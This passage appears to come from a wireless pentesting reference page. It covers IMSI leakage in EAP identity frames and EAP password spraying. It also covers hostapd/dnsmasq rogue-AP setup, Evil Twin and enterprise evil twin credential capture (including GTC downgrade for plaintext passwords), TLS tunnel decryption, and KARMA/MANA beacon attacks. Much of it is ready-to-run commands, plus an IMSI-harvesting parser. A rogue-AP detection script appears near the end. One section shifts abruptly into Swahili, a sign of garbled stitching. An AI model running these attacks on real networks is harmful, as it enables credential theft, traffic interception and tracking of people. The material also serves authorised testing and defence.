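Pulling the identity out of the EAP-Response/Identity frame and deciding whether it is a permanent IMSI, as an added example (not Wireshark, Kismet or tcpdump code): a parser for the 802.1X/EAP headers that the display filter `eap.code == 2 && eap.type == 1` selects, plus a classifier based on the 3GPP NAI realm and the RFC 4186/4187 leading digit ("1" for EAP-SIM, "0" for EAP-AKA, "6" for EAP-AKA'); a tag-less IMSI like the page's own example NAI is matched too. The EAPOL payloads are constructed in the script; on a real capture, feed it the EAPOL payload bytes of each frame. The same parser also exposes the plaintext username of the PEAP/TTLS identity exchange described above.

```python
"""Parse EAP-Response/Identity from raw 802.1X (EAPOL) payloads and flag
permanent 3GPP identities (an IMSI inside a NAI). Added example; not
eaphammer, Wireshark or Kismet code. The EAPOL payloads are constructed so the
script runs offline; in a capture they are the bytes following the 802.11
header and the 0x888e LLC/SNAP type.

802.1X header: version(1) type(1: 0 = EAP-Packet) length(2)
EAP header:    code(1: 2 = Response) id(1) length(2) type(1: 1 = Identity) data
"""
import re
import struct

EAPOL_TYPE_EAP = 0
EAP_CODE_RESPONSE = 2
EAP_TYPE_IDENTITY = 1

# RFC 4186/4187/5448: permanent usernames start with "1" (SIM), "0" (AKA) or "6" (AKA')
# followed by the 14-15 digit IMSI; the realm is the 3GPP home-network realm.
IMSI_NAI = re.compile(
    r"^(?P<tag>[016])?(?P<imsi>\d{14,15})@wlan\.mnc(?P<mnc>\d{3})\.mcc(?P<mcc>\d{3})\.3gppnetwork\.org$")


def parse_eap_identity(eapol: bytes):
    """Return the identity string from an EAP-Response/Identity, else None."""
    if len(eapol) < 9:
        return None
    _ver, eapol_type, eapol_len = struct.unpack("!BBH", eapol[:4])
    if eapol_type != EAPOL_TYPE_EAP:
        return None
    eap = eapol[4:4 + eapol_len]
    if len(eap) < 5:
        return None
    code, _eap_id, eap_len = struct.unpack("!BBH", eap[:4])
    if code != EAP_CODE_RESPONSE or eap_len < 5 or eap[4] != EAP_TYPE_IDENTITY:
        return None
    return eap[5:eap_len].decode("utf-8", errors="replace")


def classify_identity(identity: str) -> dict:
    """Label an outer identity: permanent IMSI (leak) or anything else (pseudonym, anonymous@realm, plain username)."""
    m = IMSI_NAI.match(identity)
    if m:
        return {"leak": True, "imsi": m["imsi"], "mcc": m["mcc"], "mnc": m["mnc"]}
    return {"leak": False, "identity": identity}


def build_identity_response(identity: str, eap_id: int = 1) -> bytes:
    """Construct an EAPOL/EAP-Response/Identity payload (sample input only)."""
    data = identity.encode()
    eap = struct.pack("!BBHB", EAP_CODE_RESPONSE, eap_id, 5 + len(data), EAP_TYPE_IDENTITY) + data
    return struct.pack("!BBH", 2, EAPOL_TYPE_EAP, len(eap)) + eap


def harvest(eapol_frames):
    """Run over EAPOL payloads; return only the identities that leak an IMSI."""
    findings = []
    for raw in eapol_frames:
        identity = parse_eap_identity(raw)
        if identity:
            info = classify_identity(identity)
            if info["leak"]:
                findings.append(info)
    return findings


# Constructed frames: a bare EAP-SIM client (leaks), a client using a pseudonym, and an
# EAPOL-Key frame (type 3) that the parser must ignore.
CONSTRUCTED = [
    build_identity_response("1208150123456789@wlan.mnc015.mcc208.3gppnetwork.org"),
    build_identity_response("3kjh4j2h4kj2h4kj2h@wlan.mnc015.mcc208.3gppnetwork.org"),
    bytes.fromhex("0203005f") + b"\x00" * 0x5f,
]

if __name__ == "__main__":
    for finding in harvest(CONSTRUCTED):
        print("IMSI exposed:", finding)
```

The mcc/mnc digits come straight out of the realm, so a single passive capture tells you the operator as well as the subscriber; a deployment that has fixed the issue only ever shows pseudonyms (leading "3"), fast re-authentication identities (leading "5") or an anonymous outer identity here.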

Impact

  • Privacy: persistent user/device tracking from passive Wi‑Fi capture in public places.
  • Enabler for telecom abuse: with an IMSI, an attacker with SS7/Diameter access can query location or attempt call/SMS interception and MFA theft.

Mitigations / what to look for

  • Verify that clients use anonymous outer identities (pseudonyms) for EAP‑SIM/AKA as described in 3GPP guidance (e.g., 3GPP TS 33.402).
  • Prefer tunnelling the identity phase (e.g., EAP‑TTLS/PEAP carrying inner EAP‑SIM/AKA) so the IMSI is never sent in the clear.
  • Packet captures of association/auth should never show a raw IMSI in EAP-Response/Identity.

Related: abuse of telecom signalling with harvested mobile identifiers, see Telecom Network Exploitation

EAP-Bruteforce (password spray)

If the client is expected to use a username and password (note that EAP-TLS won't be valid in this case), then you could try to get a list of usernames (see the previous part) and passwords and try to bruteforce access using air-hammer.

bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

You can also perform this attack with eaphammer:

bash
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Client attacks theory

Network selection and roaming

  • The 802.11 protocol defines how a station joins an Extended Service Set (ESS) but does not specify the criteria for selecting an ESS or an access point (AP) within it.
  • Stations can roam between APs sharing the same ESSID, maintaining connectivity across a building or area.
  • The protocol requires station authentication to the ESS but does not mandate AP authentication to the station.

Preferred Network Lists (PNLs)

  • Stations store the ESSID of every wireless network they connect to in their Preferred Network List (PNL), along with network-specific configuration details.
  • The PNL is used to automatically connect to known networks, improving the user's experience by streamlining the connection process.

Passive Scanning

  • APs periodically broadcast beacon frames, announcing their presence and features, including the AP's ESSID unless broadcasting is disabled.
  • During passive scanning, stations listen for beacon frames. If a beacon's ESSID matches an entry in the station's PNL, the station may automatically connect to that AP.
  • Knowledge of a device's PNL allows potential exploitation by mimicking a known network's ESSID, tricking the device into connecting to a rogue AP.

Active Probing

  • Active probing involves stations sending probe requests to discover nearby APs and their characteristics.
  • Directed probe requests target a specific ESSID, helping to detect if a particular network is within range, even if it is a hidden network.
  • Broadcast probe requests have a null SSID field and are sent to all nearby APs, letting the station check for any preferred network without disclosing its PNL contents.

Simple AP with redirection to Internet

Before explaining how to perform the more complex attacks, it is going to be explained how to just create an AP and redirect its traffic to an interface connected to the Internet.

Using ifconfig -a check that the wlan interface to create the AP and the interface connected to the Internet are present.

DHCP & DNS

bash
apt-get install dnsmasq #Manages DHCP and DNS

Create the config file /etc/dnsmasq.conf:

ini
interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Then set IPs and routes:

bash
ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Then start dnsmasq:

bash
dnsmasq -C /etc/dnsmasq.conf -d

hostapd

bash
apt-get install hostapd

Create the config file hostapd.conf:

ini
interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Kill interfering processes, leave the interface in managed mode (hostapd switches it to AP mode itself through nl80211; do not put it in monitor mode, the same requirement eaphammer has below), and start hostapd:

bash
airmon-ng check kill
iwconfig wlan0 mode managed
ifconfig wlan0 up
hostapd ./hostapd.conf

Forwarding and Redirection

bash
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil Twin

Shambulio la evil twin linatumia jinsi wateja wa WiFi wanavyotambua mitandao, kwa msingi kutegemea jina la mtandao (ESSID) bila kuhitaji base station (access point) kujithibitisha kwa mteja. Mambo muhimu ni pamoja na:

  • Difficulty in Differentiation: Vifaa vinashindwa kutofautisha kati ya access points halali na access points isiyo halali wanaposhirikisha ESSID na aina ya usimbaji. Mitandao ya kweli mara nyingi hutumia access points kadhaa zenye ESSID sawa ili kupanua eneo la kufunika bila mshono.
  • Client Roaming and Connection Manipulation: Protokoli ya 802.11 inaruhusu vifaa kuhama kati ya access points ndani ya ESS ileile. Washambuliaji wanaweza kutumia hili kwa kujaribu kuvutia kifaa kukatisha muunganisho kutoka kwenye base station yake ya sasa na kujiunga na rogue access point. Hii inaweza kufikiwa kwa kutoa ishara yenye nguvu zaidi au kuharibu muunganisho wa access point halali kwa njia kama deauthentication packets au jamming.
  • Challenges in Execution: Kufanikiwa kutekeleza evil twin attack katika mazingira yenye access points nyingi zilizo pangwa vizuri kunaweza kuwa changamoto. Deauthenticating access point halali moja mara nyingi husababisha kifaa kuungana na access point halali nyingine isipokuwa washambuliaji waweze deauthenticate access points zote zilizo karibu au kuweka rogue access point kwa kimkakati.

Unaweza kuunda Open Evil Twin ya msingi sana (bila uwezo wa kusafirisha trafiki kwenda Internet) kwa kufanya:

bash
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

Unaweza pia kuunda Evil Twin kwa kutumia eaphammer (kumbuka kwamba, ili kuunda evil twins kwa eaphammer, interface haipaswi kuwa katika monitor mode):

bash
./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Au ukitumia Airgeddon: Options: 5,6,7,8,9 (inside Evil Twin attack menu).

Tafadhali, kumbuka kwamba kwa chaguo-msingi ikiwa ESSID kwenye PNL imehifadhiwa kama WPA protected, kifaa hakitajiunganishwa moja kwa moja na Open evil Twin. Unaweza kujaribu kufanya DoS kwa AP halisi na kutegemea kwamba mtumiaji ataunganishwa kwa mikono kwenye Open evil twin yako, au unaweza kufanya DoS kwa AP halisi na kutumia WPA Evil Twin kukamata handshake (kwa kutumia mbinu hii hautaweza kumruhusu mwathirika aunganishwe kwako kwa sababu hujui PSK, lakini unaweza kukamata handshake na kujaribu ku-crack).

Some OSes and AVs will warn the user that connecting to an Open network is dangerous...

WPA/WPA2 Evil Twin

You can create an Evil Twin using WPA/2, and if the devices are configured to connect to that SSID with WPA/2 they will try to connect. However, to complete the 4-way handshake you also need to know the password the client is going to use. If you don't know it, the connection won't be completed.

bash
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Enterprise Evil Twin

To understand these attacks I recommend reading the WPA Enterprise explanation summary first.

Using hostapd-wpe

hostapd-wpe needs a configuration file to work. To automate the generation of these configurations you can use https://github.com/WJDigby/apd_launchpad (download the python file inside /etc/hostapd-wpe/)

bash
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

In the configuration file you can select many different things such as ssid, channel, user files, cert/key, dh parameters, wpa version and auth...

Using hostapd-wpe with EAP-TLS to allow any certificate to log in.

Using EAPHammer

bash
# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

By default, EAPHammer uses these authentication methods (note GTC as the first one, to try to obtain plaintext passwords, and then the use of more robust auth methods):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

This is the default methodology to avoid long connection times. However, you can also specify the server authentication methods from weakest to strongest:

--negotiate weakest

Or you can also use:

  • --negotiate gtc-downgrade to use highly efficient GTC downgrade implementation (plaintext passwords)
  • --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP to specify manually the methods offered (offering the same auth methods in the same order as the organisation makes the attack much more difficult to detect).
  • Find more info in the wiki

Using Airgeddon

Airgeddon can use previously generated certificates to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5, so it will be able to capture the user and the MD5 of the password. Later, the attacker can try to crack the password.
Airgeddon offers the possibility of a continuous Evil Twin attack (noisy) or only creating the Evil Twin until someone connects (smooth).

Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twin attacks

This method was tested in a PEAP connection, but as I'm decrypting an arbitrary TLS tunnel this should also work with EAP-TTLS.

In the hostapd-wpe configuration, comment out the line that specifies dh_file (from dh_file=/etc/hostapd-wpe/certs/dh to #dh_file=/etc/hostapd-wpe/certs/dh)
This will make hostapd-wpe exchange keys using RSA instead of DH, so you will be able to decrypt the traffic later knowing the server's private key.

Now start the Evil Twin using hostapd-wpe with the modified configuration as usual. Also, start wireshark on the interface that is performing the Evil Twin attack.

Now or later (once you have already captured some authentication attempts) you can add the RSA private key to wireshark in: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

Add a new entry and fill in the form with these values: IP address = any -- Port = 0 -- Protocol = data -- Key File (select your key file; to avoid problems, select a key file that is not password protected).

And look at the new "Decrypted TLS" tab:

KARMA, MANA, Loud MANA and Known beacons attack

ESSID and MAC black/whitelists

The different types of Media Access Control Filter Lists (MFACLs) and their corresponding modes, together with their effects on the behaviour of the rogue Access Point (AP):

  1. MAC-based Whitelist:
  • The rogue AP will only respond to probe requests from devices listed in the whitelist, remaining invisible to all others not listed.
  2. MAC-based Blacklist:
  • The rogue AP will ignore probe requests from devices on the blacklist, effectively making the rogue AP invisible to those specific devices.
  3. SSID-based Whitelist:
  • The rogue AP will only respond to probe requests for the specific ESSIDs listed, making it invisible to devices whose Preferred Network Lists (PNLs) do not contain those ESSIDs.
  4. SSID-based Blacklist:
  • The rogue AP will not respond to probe requests for the specific ESSIDs on the blacklist, making it invisible to devices seeking those particular networks.

bash
# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
bash
# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

This method allows an attacker to create a malicious access point (AP) that responds to all probe requests from devices seeking to connect to networks. The technique exploits devices into connecting to the attacker's AP by imitating the networks the devices are searching for. Once a device sends a connection request to this rogue AP, the connection is completed and the device mistakenly connects to the attacker's network.

MANA

Then, devices started to ignore unsolicited network responses, reducing the effectiveness of the original karma attack. However, a new method, called the MANA attack, was developed by Ian de Villiers and Dominic White. This method involves the rogue AP capturing the Preferred Network Lists (PNL) from devices by responding to their broadcast probe requests with network names (SSIDs) previously solicited by the devices. This sophisticated attack bypasses the protections against the basic karma attack by exploiting the way devices remember and prioritise known networks.

The MANA attack works by monitoring both directed and broadcast probe requests from devices. For directed requests, it records the device's MAC address and the requested network name, adding this information to a list. When a broadcast request is received, the AP responds with information matching any of the networks on the device's list, enticing the device to connect to the rogue AP.

bash
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

A Loud MANA attack is an advanced strategy used when devices do not use directed probing or when their Preferred Network Lists (PNL) are unknown to the attacker. It operates on the principle that devices in the same area are likely to share some network names in their PNLs. Instead of responding selectively, this attack broadcasts probe responses for every network name (ESSID) found in the combined PNLs of all observed devices. This broad approach increases the chance of a device recognising a familiar network and attempting to connect to the rogue Access Point (AP).

bash
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Known Beacon attack

When the Loud MANA attack may not suffice, the Known Beacon attack offers another approach. This method brute-forces the connection process by simulating an AP that responds to any network name, cycling through a list of potential ESSIDs derived from a wordlist. This simulates the presence of many networks, hoping to match an ESSID within the victim's PNL and prompting a connection attempt to the fabricated AP. The attack can be amplified by combining it with the --loud option for a more aggressive attempt to capture devices.

Eaphammer implemented this attack as a MANA attack in which all the ESSIDs in a list are broadcast (you can also combine this with --loud to create a Loud MANA + Known beacons attack):

bash
./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Known Beacon Burst attack

The Known Beacon Burst attack involves rapid-fire broadcasting of beacon frames for each ESSID listed in a file. This creates a dense environment of fake networks, greatly increasing the likelihood of devices connecting to the rogue AP, especially when combined with a MANA attack. This technique leverages speed and volume to overwhelm the network selection mechanisms of devices.

bash
# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5
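From the defender's side, the Open/WPA Evil Twin described earlier and the MANA, Loud MANA and Known Beacon variants above leave two visible signatures in a wireless capture: an unknown BSSID advertising a managed SSID (often with weaker security than the real one), and a single BSSID answering for many unrelated SSIDs. The following is an added example, not code from the original page or from EAPHammer, that flags both in beacon/probe-response records; the CSV layout, the BSSID inventory and the records themselves are constructed for the example.

```python
# Rogue-AP detection over captured beacon / probe-response records.
# Added example: the CSV layout and the records below are constructed, not real.
from collections import defaultdict

# Constructed sample, one frame per line: ts,frame,bssid,ssid,privacy
SAMPLE_FRAMES = """\
1,beacon,02:11:22:33:44:01,CorpWifi,WPA2
2,beacon,02:11:22:33:44:02,CorpWifi,WPA2
3,beacon,02:DE:AD:BE:EF:01,CorpWifi,OPN
4,probe_resp,02:de:ad:be:ef:01,HomeNet,OPN
5,probe_resp,02:de:ad:be:ef:01,Airport_Free,OPN
6,probe_resp,02:de:ad:be:ef:01,CoffeeShop,OPN
7,probe_resp,02:de:ad:be:ef:01,Hotel-Guest,OPN
8,beacon,02:11:22:33:44:01,CorpWifi,WPA2
"""
# Inventory of legitimate APs (constructed; normally exported from the controller)
KNOWN_BSSIDS = {"02:11:22:33:44:01", "02:11:22:33:44:02"}

def parse_frames(text):
    """Parse CSV records into dicts; BSSIDs are normalised to lower case."""
    frames = []
    for line in text.strip().splitlines():
        ts, frame, bssid, ssid, privacy = line.split(",")
        frames.append({"ts": int(ts), "frame": frame, "bssid": bssid.lower(),
                       "ssid": ssid, "privacy": privacy})
    return frames

def find_rogue_aps(frames, known_bssids, ssid_threshold=3):
    """Return {bssid: [reason, ...]} for every BSSID that looks rogue."""
    known = {b.lower() for b in known_bssids}
    ssids_per_bssid = defaultdict(set)  # SSIDs each BSSID claims to serve
    managed = defaultdict(set)          # SSID -> privacy modes of the legit APs
    for f in frames:
        ssids_per_bssid[f["bssid"]].add(f["ssid"])
        if f["bssid"] in known:
            managed[f["ssid"]].add(f["privacy"])
    findings = defaultdict(list)
    for f in frames:  # signature 1: evil twin of a managed SSID, maybe downgraded
        if f["bssid"] in known or f["ssid"] not in managed:
            continue
        reason = f"unknown BSSID advertises managed SSID {f['ssid']!r}"
        if f["privacy"] not in managed[f["ssid"]]:
            reason += f" with {f['privacy']} instead of {'/'.join(sorted(managed[f['ssid']]))}"
        if reason not in findings[f["bssid"]]:  # same frame seen repeatedly
            findings[f["bssid"]].append(reason)
    for bssid, ssids in ssids_per_bssid.items():  # signature 2: KARMA/MANA-style
        if bssid not in known and len(ssids) >= ssid_threshold:
            findings[bssid].append(f"responds for {len(ssids)} distinct SSIDs")
    return dict(findings)
```

A WIDS would feed real frames into `find_rogue_aps` and raise an alert on any BSSID it returns; the threshold of 3 SSIDs per BSSID is an assumption that should be tuned to the environment.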

Wi-Fi Direct

Wi-Fi Direct is a protocol that enables devices to link directly with each other using Wi-Fi, without the need for a traditional wireless access point. This capability is built into various Internet of Things (IoT) devices, such as printers and televisions, facilitating direct device-to-device communication. A notable feature of Wi-Fi Direct is that one device takes on the role of an access point, known as the group owner, to manage the connection.

Security for Wi-Fi Direct connections is established through Wi-Fi Protected Setup (WPS), which supports several methods for secure pairing, including:

  • Push-Button Configuration (PBC)
  • PIN entry
  • Near-Field Communication (NFC)

These methods, particularly PIN entry, are susceptible to the same vulnerabilities as WPS in traditional Wi-Fi networks, making them targets for similar attack vectors.

EvilDirect Hijacking

EvilDirect Hijacking is a specific attack against Wi-Fi Direct. It mirrors the concept of an Evil Twin attack but targets Wi-Fi Direct connections. In this scenario, an attacker impersonates a legitimate group owner with the aim of deceiving devices into connecting to a malicious entity. This method can be executed using tools like airbase-ng by specifying the channel, ESSID, and MAC address of the impersonated device:

References

TODO: Check https://github.com/wifiphisher/wifiphisher (login with facebook and WPA impersonation in captive portals)
